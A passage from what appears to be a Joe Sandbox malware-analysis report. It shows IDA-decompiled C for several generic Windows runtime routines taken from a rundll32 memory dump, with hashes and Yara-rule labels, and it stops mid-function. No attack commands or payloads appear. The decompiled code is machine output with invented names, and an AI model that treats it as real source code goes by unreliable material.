                                                                                            • Instruction ID: 53601140412a556795975c1fd70bbfd06a7ed8238716d4d218404109e64a954b
                                                                                            • Opcode Fuzzy Hash: 68f8833f00f1eb7105e76d524f309e9be568c08831a1f775b6beec58f4124ed5
                                                                                            • Instruction Fuzzy Hash: 1141B071A40318AFEB35DF14CD80BABB7A9EB55714F04809AEA4597390FB74FD40CA91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04604BAD Relevance: .1, Instructions: 131COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 85%
                                                                                            			E04604BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x46cd360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E045DCC50(_t86);
					L11:
					return E0461B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x46c8504
				E045F2280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E0461FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E0461B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L045F4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E045DCCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x46c8504
								E045EFFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E04604F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                                                                                            0x04604bad
                                                                                            0x04604bbf
                                                                                            0x04604bc2
                                                                                            0x04604bc6
                                                                                            0x04604bcd
                                                                                            0x04604bd9
                                                                                            0x046467fe
                                                                                            0x04646800
                                                                                            0x04604ccc
                                                                                            0x04604ccd
                                                                                            0x04604cb7
                                                                                            0x04604cc9
                                                                                            0x04604cc9
                                                                                            0x04604bdf
                                                                                            0x04604be5
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04604beb
                                                                                            0x04604bef
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04604bf5
                                                                                            0x04604bf9
                                                                                            0x04604c06
                                                                                            0x04604c0b
                                                                                            0x04604c17
                                                                                            0x04604c1c
                                                                                            0x04604c1f
                                                                                            0x04604c25
                                                                                            0x04604c33
                                                                                            0x04604c3d
                                                                                            0x04604c40
                                                                                            0x04604c43
                                                                                            0x04604c47
                                                                                            0x04604c4d
                                                                                            0x04604c53
                                                                                            0x04604c54
                                                                                            0x04604c55
                                                                                            0x04604c56
                                                                                            0x04604c5b
                                                                                            0x04604c5c
                                                                                            0x04604c63
                                                                                            0x04604c6b
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04646776
                                                                                            0x04646784
                                                                                            0x04646784
                                                                                            0x0464679f
                                                                                            0x046467a7
                                                                                            0x046467af
                                                                                            0x046467ce
                                                                                            0x00000000
                                                                                            0x046467b1
                                                                                            0x046467b7
                                                                                            0x046467b8
                                                                                            0x046467c1
                                                                                            0x046467d3
                                                                                            0x046467d9
                                                                                            0x046467dd
                                                                                            0x04604c94
                                                                                            0x04604c94
                                                                                            0x04604c98
                                                                                            0x04604c9c
                                                                                            0x04604ca3
                                                                                            0x046467f4
                                                                                            0x046467f4
                                                                                            0x04604cb5
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04604cb5
                                                                                            0x04604c79
                                                                                            0x04604c7e
                                                                                            0x04604c89
                                                                                            0x04604c8b
                                                                                            0x04604c8f
                                                                                            0x04604c8f
                                                                                            0x00000000
                                                                                            0x04604c89
                                                                                            0x046467c3
                                                                                            0x00000000
                                                                                            0x046467c3
                                                                                            0x046467af
                                                                                            0x04604c73
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ace958f7730f8331495a81b005008a9403a7edd43394da1e5d6a0bf429e838d7
                                                                                            • Instruction ID: 1addb17e9340ef47eeb9d2f495265e57fc899a37387fc102eb5ee2d4c32474f9
                                                                                            • Opcode Fuzzy Hash: ace958f7730f8331495a81b005008a9403a7edd43394da1e5d6a0bf429e838d7
                                                                                            • Instruction Fuzzy Hash: 1D41A475A002289BDF35DF64C940BEA77B4FF85710F0145A5EA08AB350EB78BE81CB95
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 045E8A0A Relevance: .1, Instructions: 120COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 94%
                                                                                            			E045E8A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x46cd360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E0461B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E045EE9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x45b1180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E04601DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E04613C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E045E8999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                                                                                            0x045e8a0a
                                                                                            0x045e8a1c
                                                                                            0x045e8a23
                                                                                            0x045e8a2e
                                                                                            0x045e8a30
                                                                                            0x045e8a36
                                                                                            0x045e8a3c
                                                                                            0x045e8a3e
                                                                                            0x045e8a4a
                                                                                            0x045e8a52
                                                                                            0x045e8a9c
                                                                                            0x045e8aae
                                                                                            0x045e8a58
                                                                                            0x045e8a5e
                                                                                            0x045e8a6a
                                                                                            0x045e8a6f
                                                                                            0x045e8a75
                                                                                            0x045e8a7d
                                                                                            0x045e8a85
                                                                                            0x045e8a86
                                                                                            0x045e8a89
                                                                                            0x045e8a93
                                                                                            0x045e8a99
                                                                                            0x045e8a9b
                                                                                            0x00000000
                                                                                            0x045e8aaf
                                                                                            0x045e8abe
                                                                                            0x045e8ac3
                                                                                            0x045e8acb
                                                                                            0x045e8ad7
                                                                                            0x045e8ae0
                                                                                            0x045e8af1
                                                                                            0x00000000
                                                                                            0x045e8af1
                                                                                            0x045e8acd
                                                                                            0x045e8ad5
                                                                                            0x045e8afb
                                                                                            0x045e8afd
                                                                                            0x045e8aff
                                                                                            0x045e8b07
                                                                                            0x045e8b22
                                                                                            0x045e8b24
                                                                                            0x045e8b2a
                                                                                            0x045e8b2e
                                                                                            0x045e8b3f
                                                                                            0x045e8b78
                                                                                            0x045e8b41
                                                                                            0x045e8b52
                                                                                            0x045e8b54
                                                                                            0x045e8b5c
                                                                                            0x045e8b74
                                                                                            0x045e8b74
                                                                                            0x045e8b5c
                                                                                            0x045e8b3f
                                                                                            0x045e8b5e
                                                                                            0x045e8b61
                                                                                            0x045e8b64
                                                                                            0x045e8b64
                                                                                            0x045e8b6c
                                                                                            0x045e8b6c
                                                                                            0x045e8b11
                                                                                            0x04639cd5
                                                                                            0x04639cd5
                                                                                            0x045e8b17
                                                                                            0x045e8b1a
                                                                                            0x045e8b1a
                                                                                            0x00000000
                                                                                            0x045e8ad5
                                                                                            0x045e8a89

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 88f97dcb98e6fe21462420d4d6c67c95445b552a4be4d8ab0b78c90ba8e9dab1
                                                                                            • Instruction ID: 2d39d63663ff01ef36f545fadeaecabd23e8853029a6774ffef4477289044bc0
                                                                                            • Opcode Fuzzy Hash: 88f97dcb98e6fe21462420d4d6c67c95445b552a4be4d8ab0b78c90ba8e9dab1
                                                                                            • Instruction Fuzzy Hash: 224151B1A402289BDB28EF56D888AB9B3F8FF44314F1045E9D919D7251E770AE84EF50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 046569A6 Relevance: .1, Instructions: 108COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 69%
                                                                                            			E046569A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x46cd360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L045E6C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E04656BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E04619980() >= 0) {
							E045F2280(_t56, 0x46c8778);
							_t77 = 1;
							_t68 = 1;
							if( *0x46c8774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x46c8774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E045DB6F0(0x45bc338, 0x45bc288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E04619520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E046195D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E045EFFB0(_t68, _t77, 0x46c8778);
				}
				_pop(_t78);
				return E0461B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                                                                                            0x046569b5
                                                                                            0x046569be
                                                                                            0x046569c3
                                                                                            0x046569c9
                                                                                            0x046569cc
                                                                                            0x046569d1
                                                                                            0x046569d3
                                                                                            0x046569de
                                                                                            0x046569e1
                                                                                            0x046569ea
                                                                                            0x046569f6
                                                                                            0x046569fe
                                                                                            0x04656a13
                                                                                            0x04656a14
                                                                                            0x04656a15
                                                                                            0x04656a16
                                                                                            0x04656a1e
                                                                                            0x04656a26
                                                                                            0x04656a31
                                                                                            0x04656a36
                                                                                            0x04656a37
                                                                                            0x04656a40
                                                                                            0x04656a49
                                                                                            0x04656a4a
                                                                                            0x04656a53
                                                                                            0x04656a59
                                                                                            0x04656a5d
                                                                                            0x04656a5e
                                                                                            0x04656a64
                                                                                            0x04656a67
                                                                                            0x04656a6a
                                                                                            0x04656a6d
                                                                                            0x04656a70
                                                                                            0x04656a77
                                                                                            0x04656a7d
                                                                                            0x04656a86
                                                                                            0x04656a89
                                                                                            0x04656a9c
                                                                                            0x04656a9f
                                                                                            0x04656aa2
                                                                                            0x04656aa5
                                                                                            0x04656aaf
                                                                                            0x04656ab1
                                                                                            0x04656ab8
                                                                                            0x04656ab9
                                                                                            0x04656abb
                                                                                            0x04656abe
                                                                                            0x04656ac5
                                                                                            0x04656ac5
                                                                                            0x04656aaf
                                                                                            0x04656a40
                                                                                            0x04656a26
                                                                                            0x046569fe
                                                                                            0x04656ace
                                                                                            0x04656ad0
                                                                                            0x04656ad3
                                                                                            0x04656ad8
                                                                                            0x04656adf
                                                                                            0x04656adf
                                                                                            0x04656ae8
                                                                                            0x04656aef
                                                                                            0x04656aef
                                                                                            0x04656af9
                                                                                            0x04656b06

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 724e886cf511c624002fc0f002377a1791dbd24dcd57e02e1d1edb217f4929e7
                                                                                            • Instruction ID: 632698aa3a03340c770644892d2906ff4dc9320fd915591d2f54215fbfe8f35f
                                                                                            • Opcode Fuzzy Hash: 724e886cf511c624002fc0f002377a1791dbd24dcd57e02e1d1edb217f4929e7
                                                                                            • Instruction Fuzzy Hash: 1D416AB1D00208AFEB25DFA5D940BFEBBF4FF48714F14812AE919A7250EB74A905CB50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 045D5210 Relevance: .1, Instructions: 107COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 85%
                                                                                            			E045D5210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E045D52A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E046195D0();
							L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E045EEB70(_t54, 0x46c79a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E046195D0();
								L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E045EEB70(_t54, 0x46c79a0);
						}
						return _t52;
					}
					L5:
					_t33 = E0461F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E045EEB70(_t54, 0x46c79a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E046195D0();
							L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                                                                                            0x045d5220
                                                                                            0x045d5224
                                                                                            0x04630d13
                                                                                            0x04630d16
                                                                                            0x04630d19
                                                                                            0x045d522a
                                                                                            0x045d522a
                                                                                            0x045d522d
                                                                                            0x045d522d
                                                                                            0x045d5231
                                                                                            0x045d5235
                                                                                            0x045d5239
                                                                                            0x04630d5c
                                                                                            0x04630d62
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04630d6a
                                                                                            0x04630d7b
                                                                                            0x04630d7f
                                                                                            0x04630d81
                                                                                            0x04630d84
                                                                                            0x04630d95
                                                                                            0x04630d95
                                                                                            0x04630d6c
                                                                                            0x04630d71
                                                                                            0x04630d71
                                                                                            0x04630d9a
                                                                                            0x00000000
                                                                                            0x045d524a
                                                                                            0x045d524a
                                                                                            0x045d5250
                                                                                            0x04630d24
                                                                                            0x04630d35
                                                                                            0x04630d39
                                                                                            0x04630d3b
                                                                                            0x04630d3e
                                                                                            0x04630d50
                                                                                            0x04630d50
                                                                                            0x04630d26
                                                                                            0x04630d2b
                                                                                            0x04630d2b
                                                                                            0x00000000
                                                                                            0x04630d55
                                                                                            0x045d5256
                                                                                            0x045d525b
                                                                                            0x045d5265
                                                                                            0x04630da7
                                                                                            0x045d526b
                                                                                            0x045d526e
                                                                                            0x045d5272
                                                                                            0x04630db1
                                                                                            0x04630db4
                                                                                            0x04630dc5
                                                                                            0x04630dc5
                                                                                            0x045d5272
                                                                                            0x045d5278
                                                                                            0x045d527e
                                                                                            0x045d528a
                                                                                            0x045d528c
                                                                                            0x045d528d
                                                                                            0x00000000
                                                                                            0x045d5280
                                                                                            0x045d5282
                                                                                            0x045d5288
                                                                                            0x045d529f
                                                                                            0x045d5292
                                                                                            0x00000000
                                                                                            0x045d5292
                                                                                            0x00000000
                                                                                            0x045d5288
                                                                                            0x045d527e

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cfd927bdf219f8202956c44beb20fefb26be89a5c6498292fa5e4098d93d9407
                                                                                            • Instruction ID: 8b82be336a4a68d22c8b764b129dc2ecf62cd4249c42b9b966c97b83c0b8165c
                                                                                            • Opcode Fuzzy Hash: cfd927bdf219f8202956c44beb20fefb26be89a5c6498292fa5e4098d93d9407
                                                                                            • Instruction Fuzzy Hash: BE312631651645EBD7359F28CC81B7A77E5FF50765F104A1AE4160B2A4FB30F808EAD0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04613D43 Relevance: .1, Instructions: 106COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E04613D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E045E7B60(0, _t61, 0x45b11c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E045E7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L045F4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                                                                            0x04613d4c
                                                                                            0x04613d50
                                                                                            0x04613d55
                                                                                            0x04613d5e
                                                                                            0x0464e79a
                                                                                            0x00000000
                                                                                            0x0464e79a
                                                                                            0x04613d68
                                                                                            0x0464e789
                                                                                            0x04613d9d
                                                                                            0x04613da3
                                                                                            0x04613daf
                                                                                            0x04613db5
                                                                                            0x04613dbc
                                                                                            0x04613dc4
                                                                                            0x04613dc9
                                                                                            0x04613dce
                                                                                            0x0464e7ae
                                                                                            0x0464e7ae
                                                                                            0x04613dde
                                                                                            0x04613de2
                                                                                            0x04613de7
                                                                                            0x04613e0d
                                                                                            0x04613e13
                                                                                            0x04613e16
                                                                                            0x04613e1e
                                                                                            0x04613e25
                                                                                            0x04613e28
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04613e2a
                                                                                            0x04613e2f
                                                                                            0x04613e37
                                                                                            0x04613e37
                                                                                            0x00000000
                                                                                            0x04613e37
                                                                                            0x04613e31
                                                                                            0x00000000
                                                                                            0x04613e31
                                                                                            0x04613e20
                                                                                            0x04613e20
                                                                                            0x04613e35
                                                                                            0x00000000
                                                                                            0x04613de9
                                                                                            0x04613de9
                                                                                            0x04613de9
                                                                                            0x04613dee
                                                                                            0x04613dfd
                                                                                            0x04613dff
                                                                                            0x04613e02
                                                                                            0x04613e05
                                                                                            0x04613e05
                                                                                            0x00000000
                                                                                            0x04613df0
                                                                                            0x04613de7
                                                                                            0x0464e78f
                                                                                            0x0464e794
                                                                                            0x04613d79
                                                                                            0x04613d84
                                                                                            0x04613d89
                                                                                            0x04613d8e
                                                                                            0x00000000
                                                                                            0x0464e7a4
                                                                                            0x04613d96
                                                                                            0x04613d9a
                                                                                            0x00000000
                                                                                            0x04613d9a
                                                                                            0x00000000
                                                                                            0x0464e794
                                                                                            0x04613d6e
                                                                                            0x04613d73
                                                                                            0x00000000
                                                                                            0x0464e7b5
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c9ddc0c5d3effe29cc5ffdf17b067ff257ca2d78ca1990017b7631a953e8166d
                                                                                            • Instruction ID: 627be7d51d8f018e0b34d5f21f25846983086c264ce3f5d5c6523aba48bcef6d
                                                                                            • Opcode Fuzzy Hash: c9ddc0c5d3effe29cc5ffdf17b067ff257ca2d78ca1990017b7631a953e8166d
                                                                                            • Instruction Fuzzy Hash: B4318331B05615DBEB248F29D481A7AB7A5FF95710B09806AE846CB360F630E881D790
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0460A61C Relevance: .1, Instructions: 106COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 78%
                                                                                            			E0460A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
